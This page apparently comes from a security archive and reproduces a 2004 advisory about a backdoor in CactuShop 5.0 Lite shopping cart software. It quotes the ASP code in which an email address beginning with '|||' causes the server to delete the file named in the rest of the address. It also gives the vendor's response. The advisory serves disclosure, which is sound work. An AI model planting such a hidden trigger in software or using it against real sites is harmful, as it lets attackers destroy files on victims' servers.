exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Adv-20040206.txt

Adv-20040206.txt
Posted Feb 6, 2004
Authored by Nick Gudov | Site s-quadra.com

S-Quadra Advisory #2004-02-06 - A backdoor exists in CactuSoft CactuShop 5.0 Lite shopping cart software that allows a remote attacker to delete any file on the target system.

tags | advisory, remote
SHA-256 | 264371449a786722a768f921a478dfb456e426a3e7b10e8ae5eea3fc8f03d804

Adv-20040206.txt

Change Mirror Download
       S-Quadra Advisory #2004-02-06

Topic: CactuSoft CactuShop 5.0 Lite shopping cart software backdoor
Severity: High
Vendor URL: http://www.cactushop.com
Advisory URL: http://www.s-quadra.com/advisories/Adv-20040206.txt
Release date: 06 Feb 2004

1. DESCRIPTION

CactuShop is an ASP application for running an e-commerce web site. It incorporates
a databased catalogue system, front end pages for product navigation, back end pages
for updating product details and robust basket code for memorizing product selections
as a visitor moves around the web site. ASP software is designed to run on a Microsoft
NT or Win 2000 server. Please visit http://www.cactushop.com for information about
CactuShop shopping cart.

2. DETAILS

There is a backdoor in 5.0 Lite versin of CactuShop allowing a remote attacker to
delete any file on target system.

The offending code can be found in includes/functions.asp file. AddToMailingList()
function which implemented in this file, adds a user's email address to store mailing
list. This function checks the provided email address and if it starts with '|||'
the rest of the address is interpetered as the name of the file to be deleted.
Below is the snip of source code:

Function AddToMailingList(strEmailAddress, strFormValue, htmlvalue)
......
'---------------------------------
'CHECK IF IT'S VALID
'---------------------------------
if strEmailAddress <> "" then
If Left(strEmailAddress, 3) = "|||" Then
Server.CreateObject("Scripting.FileSystemObject").DeleteFile(Server.MapPath("./") & Mid(strEmailAddress, 4))
AddToMailingList = GetString("ContentText_EmailAddressNotValid") & " " & strEmailFrom & "."
Exit Function
End If
else
AddToMailingList = GetString("ContentText_NoEmailAddressEntered")
Exit Function
end if
......

3. FIX INFORMATION

S-Quadra alerted CactuShop development team to these issues on 05 Feb 2004.
The following response has been received:

"The lite version of our software DOES have backdoors. It IS NOT intended for live use.
Users are specifically prohibited from using it as such!!!
If people are using this softare on a live site then they are violating our
license agreement. The full version of the software is secure."

CactuShop Lite license agreement indeed states that "IF YOU WISH TO USE THE SOFTWARE
ON A LIVE WEB SITE YOU MUST PURCHASE THE FULL VERSION. CACTUSOFT RESERVES THE RIGHT
TO TAKE BOTH LEGAL AND TECHNICAL STEPS TO PREVENT USE OF CACTUSHOP LITE IN BREACH
OF THIS AGREEMENT...", but we believe that the public should be informed about the
presense of the backdoor in CactuShop Lite.

4. CREDITS

Nick Gudov <cipher@s-quadra.com> is responsible for discovering this issue.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and network
assesment, web application security, source code review and third party product
vulnerability assesment, forensic support and reverse engineering.

S-Quadra Advisory #2004-02-06

Login or Register to add favorites

File Archive:

February 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    16 Files
  • 2
    Feb 2nd
    19 Files
  • 3
    Feb 3rd
    0 Files
  • 4
    Feb 4th
    0 Files
  • 5
    Feb 5th
    24 Files
  • 6
    Feb 6th
    2 Files
  • 7
    Feb 7th
    10 Files
  • 8
    Feb 8th
    25 Files
  • 9
    Feb 9th
    37 Files
  • 10
    Feb 10th
    0 Files
  • 11
    Feb 11th
    0 Files
  • 12
    Feb 12th
    17 Files
  • 13
    Feb 13th
    20 Files
  • 14
    Feb 14th
    25 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    6 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    35 Files
  • 20
    Feb 20th
    25 Files
  • 21
    Feb 21st
    18 Files
  • 22
    Feb 22nd
    15 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    10 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    37 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files
  • 29
    Feb 29th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close